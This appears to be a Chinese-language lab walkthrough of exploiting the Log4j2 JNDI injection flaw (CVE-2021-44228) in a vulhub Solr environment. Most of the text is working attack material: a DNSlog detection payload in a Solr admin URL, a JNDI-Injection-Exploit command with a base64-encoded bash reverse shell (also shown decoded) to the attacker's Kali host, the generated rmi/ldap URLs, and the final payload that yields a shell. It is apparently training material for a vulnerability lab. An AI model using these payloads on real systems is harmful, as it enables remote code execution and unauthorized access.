开启环境:
root@bt-virtual-machine:/zbt/vulhub-master/log4j/CVE-2021-44228# docker-compose up -d
Log4j2端口3839页面
http://192.168.29.130:8983/solr/admin/cores?action=1http://192.168.29.130:8983/solr/admin/cores?action=1
去提交dnslog payload参数:
http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn}
Dnslog中检测到信息,证明存在log4j2漏洞
攻击:
利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
#####192.168.29.128为kali攻击机监听地址,kali机执行
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI5LjEyOC82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.29.128
解密为:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,bash -i >& /dev/tcp/192.168.29.128/6969 0>&1}|{base64,-d}|{bash,-i}" -A 192.168.29.128
得到rmi、ldap参数:
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/vvl2u9
ldap://192.168.29.128:1389/vvl2u9
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.29.128:1099/xs1wkb
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/qzrfe7
ldap://192.168.29.128:1389/qzrfe7
进行payload攻击:
http://192.168.29.130:8983/solr/admin/cores?action=${jndi:rmi://192.168.29.128:1099/vvl2u9}
Kali机监听端口6969获取到权限
关闭环境